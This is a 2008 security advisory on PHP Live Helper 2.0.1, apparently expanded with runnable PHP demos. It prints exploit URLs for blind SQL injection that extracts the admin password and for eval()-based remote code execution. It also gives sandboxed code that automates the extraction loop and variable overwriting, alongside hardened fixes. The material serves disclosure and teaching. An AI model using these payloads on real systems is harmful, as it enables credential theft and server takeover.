PHP Live Helper 2.0.1 Multiple Remote Vulnerabilities

##########################################################
# GulfTech Security Research              August 16, 2008
##########################################################
# Vendor : Turnkey Web Tools, Inc
# URL : http://www.turnkeywebtools.com
# Version : PHP Live Helper <= 2.0.1
# Risk : Multiple Vulnerabilities
##########################################################


Description:
PHP Live Helper is an online support system written in PHP that
allows the visitors of a website to interact in real time with
the site owners. There are a number of issues in PHP Live Helper
that allow for several different attacks, including SQL injection,
variable overwriting, and remote code execution. The issues
require no authentication to exploit, and users are encouraged
to upgrade as soon as possible.



SQL Injection:
There are a number of SQL injection issues in PHP Live Helper
that give an attacker arbitrary access to database contents,
including administrator credentials. First, let's have a
look at global.php @ lines 51-60

function get ($table, $id, $from="id") {
    $result=$this->DB_site->query_first("SELECT * FROM ".
    $this->dbprefix.$table." where ".$from."='$id'");
    if (is_array($result)) {
        foreach ($result as $key => $val) {
            $info[$key] = stripslashes($val);
        }
    }
    return $info;
}

As we can see in the above code, none of the parameters passed to
the get() function are sanitized or escaped: $table and $from are
concatenated straight into the query as identifiers, and $id is
dropped inside a single-quoted string. So, if the data is not
sanitized before being sent to get(), we have an SQL injection issue.

/onlinestatus_html.php?dep=-99' UNION SELECT 1,2,3,4,5,6,7,8 FROM
admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/*

An example of the vulnerable function being called can be seen in
onlinestatus_html.php @ line 19. As a result, a URL like the one
above can be used to enumerate the admin password for the PHP Live
Helper installation one character at a time: MID(password,1,1)
selects the first character, char(50) is '2', and the trailing /*
comments out the closing quote that get() appends. If the character
at the specified position matches you will see an SQL error;
otherwise you will see an image file. Stepping the position and the
char() value through the alphabet recovers the whole hash.

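The following is an added example, not code from PHP Live Helper or from the advisory. It rebuilds the get() pattern above against an in-memory SQLite database so it runs offline, and shows the boolean oracle the onlinestatus_html.php URL relies on, the character-by-character extraction loop that oracle drives, and a hardened get() beside the vulnerable one. The table and column names (departments, admin_accounts, the three-column layout) and the password value are constructed for the demo; SQLite has no MID(), so SUBSTR() stands in for it, and the oracle here is simply "did the UNION row come back", not the SQL-error-versus-image signal the advisory describes for the real application.

```php
<?php
// Added example (not PHP Live Helper code). Everything below is a constructed
// sandbox: an in-memory SQLite DB, demo tables, and a demo password.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE departments (id INTEGER, name TEXT, active INTEGER)");
$db->exec("CREATE TABLE admin_accounts (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO departments VALUES (1, 'Sales', 1)");
$db->exec("INSERT INTO admin_accounts VALUES (1, 'admin', 's3cret')");

// Same shape as the vulnerable get(): every argument is concatenated into SQL.
function vulnerable_get(PDO $db, string $table, string $id, string $from = 'id'): ?array {
    $sql = "SELECT * FROM " . $table . " where " . $from . "='" . $id . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: $id is bound as a parameter. $table and $from are identifiers,
// which cannot be bound, so they are checked against an allowlist instead.
function safe_get(PDO $db, string $table, string $id, string $from = 'id'): ?array {
    static $allowed = ['departments' => ['id', 'name']];   // assumed allowlist
    if (!isset($allowed[$table]) || !in_array($from, $allowed[$table], true)) {
        throw new InvalidArgumentException("unexpected identifier: $table.$from");
    }
    $stmt = $db->prepare("SELECT * FROM $table WHERE $from = ?");
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The oracle. The UNION must match the column count of the table actually
// queried (three here, eight in the advisory's URL); the row only comes back
// when the guessed character is right. The alphabet below contains no quote
// characters, so the payload stays syntactically valid.
function oracle(PDO $db, int $pos, string $ch): bool {
    $payload = "-99' UNION SELECT 1,2,3 FROM admin_accounts WHERE id=1"
             . " AND SUBSTR(password,$pos,1)='$ch'--";
    return vulnerable_get($db, 'departments', $payload) !== null;
}

// Character-by-character extraction driven by the oracle.
function extract_password(PDO $db, int $maxlen = 32): string {
    $alphabet = str_split('abcdefghijklmnopqrstuvwxyz0123456789');
    $out = '';
    for ($pos = 1; $pos <= $maxlen; $pos++) {
        $hit = null;
        foreach ($alphabet as $ch) {
            if (oracle($db, $pos, $ch)) { $hit = $ch; break; }
        }
        if ($hit === null) break;   // nothing matched: ran off the end of the value
        $out .= $hit;
    }
    return $out;
}

echo "recovered via vulnerable_get(): ", extract_password($db), "\n";   // s3cret

// The same payload against the hardened version is just an id value that
// matches nothing.
$payload = "-99' UNION SELECT 1,2,3 FROM admin_accounts WHERE id=1--";
var_dump(safe_get($db, 'departments', $payload));   // NULL
```

The fix worth copying is the split in safe_get(): values go through a bound parameter, identifiers go through an allowlist. Escaping $id alone would not close the hole, because $table and $from are also caller-controlled wherever a script passes request data into them.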


Arbitrary Variable Overwriting:
PHP Live Helper is vulnerable to a limited variable overwriting issue
due to some faulty register_globals emulation code. The vulnerable code
in question can be found at libsecure.php @ lines 400-414

unset ($_GET[abs_path]);
$rg = ini_get ('register_globals');
$getget_count = @count ($_GET);
$getget_keys = @array_keys ($_GET);
for ($i = 0; $i < $getget_count; ++$i)
{
  $getget_name = $getget_keys[$i];
  $getget_value = $_GET[$getget_keys[$i]];
  $_GET[$getget_name] = strip_tags (urldecode ($getget_value));
  if ($rg == 1)
  {
    $$getget_name = strip_tags (urldecode ($getget_value));
    continue;
  }
}

The above code shows that variables can be overwritten through the
variable-variable assignment $$getget_name, whose name is taken
directly from the request. Because of where it is called, only
variables from within the db config file can be overwritten
(database info, and the language file setting). This is enough,
though, to allow an attacker to execute arbitrary code on the server:
first overwrite the table prefix variable with an arbitrary SQL
query in order to gather the location of report files, then overwrite
the language file setting so that a report containing malicious PHP
code is included and executed. The odd thing is that this
register_globals emulation code is only called when register_globals
is already on, so it is kind of pointless.



Arbitrary Code Execution:
A different bit of code is set to run when register_globals is off. The
code in question is located in /includes/globalsoff.php and attempts to
emulate register_globals by recursively creating variables based on the
GPC superglobals. The problem is that all of the variable creation is
done using eval() and thus allows for remote code execution.

/chat.php?rg=0&test=";phpinfo();exit;//

A URL like the one shown above will successfully execute the specified
arbitrary PHP code: the double quote in the value closes the string
literal being built for eval(), phpinfo() and exit run as statements,
and // comments out the remainder. It should be noted that by setting
rg=0 an attacker can have this code run regardless of the
register_globals setting, since if register_globals is on the "rg"
variable can be overwritten through the issue described above, and if
it is off the script runs as intended.

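The following is an added example and not PHP Live Helper's code. It reproduces the two patterns described above with a constructed $_GET so it runs offline: the $$name assignment from libsecure.php, which lets a request overwrite any variable in the calling scope (here two stand-in config values), and a hypothetical reconstruction of the eval()-based emulation in globalsoff.php (the real file is not reproduced here; the shape is inferred from the way the rg=0&test=";phpinfo();exit;// payload breaks out). The replacement beside them is the plain one: read the parameters a script expects by name and create no variables from request keys. The variable names dbprefix and lang, and all request values, are assumptions for the demo.

```php
<?php
// Added example (not PHP Live Helper code). $_GET is constructed here so the
// file runs from the command line with no web server.
$_GET = [
    'dbprefix' => 'x UNION SELECT 1 -- ',     // collides with a config variable
    'lang'     => '../reports/evil.php',      // collides with the language setting
    'test'     => '";$injected = "code ran";//',   // harmless stand-in for phpinfo();exit;
];

// Pattern 1: the libsecure.php style. Values are passed through strip_tags(),
// but the variable *names* are attacker-chosen, so any variable already in
// this scope can be replaced. $dbprefix and $lang stand in for values the db
// config file would have set.
function emulate_globals_dollar(array $gpc): array {
    $dbprefix = 'plh_';
    $lang     = 'english.php';
    foreach ($gpc as $name => $value) {
        $$name = strip_tags(urldecode($value));
    }
    return ['dbprefix' => $dbprefix, 'lang' => $lang];
}

// Pattern 2: hypothetical shape of the globalsoff.php emulation. The request
// value is pasted into PHP source and eval()'d, so a double quote in the value
// ends the string literal and whatever follows runs as code.
function emulate_globals_eval(array $gpc): array {
    foreach ($gpc as $name => $value) {
        eval('$' . $name . ' = "' . $value . '";');
    }
    return get_defined_vars();
}

// Replacement: no variable creation at all. Each script names the parameters
// it needs; every other key in the request is ignored.
function request_param(array $gpc, string $name, string $default = ''): string {
    return isset($gpc[$name]) ? (string) $gpc[$name] : $default;
}

$cfg = emulate_globals_dollar($_GET);
echo "dbprefix after overwrite: {$cfg['dbprefix']}\n";   // attacker's SQL fragment
echo "lang after overwrite:     {$cfg['lang']}\n";       // attacker's include path

$vars = emulate_globals_eval($_GET);
echo "eval() side effect:       " . ($vars['injected'] ?? 'none') . "\n";   // code ran

$test = request_param($_GET, 'test');
echo "explicit read:            $test\n";   // plain string, nothing executed
```

The second pattern is the worse of the two, but the first already hands an attacker the table prefix (an SQL fragment) and the language file path (an include path), which is exactly the chain the advisory describes. The request_param() approach removes both problems at the source: request data never becomes a variable name or PHP source text.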

Solution:
The TurnKeyWebTools developers have addressed these issues in the latest
version of PHP Live Helper, which can be found at the following URL.

http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62


Credits:
James Bercegay of the GulfTech Security Research Team

# milw0rm.com [2008-08-18]



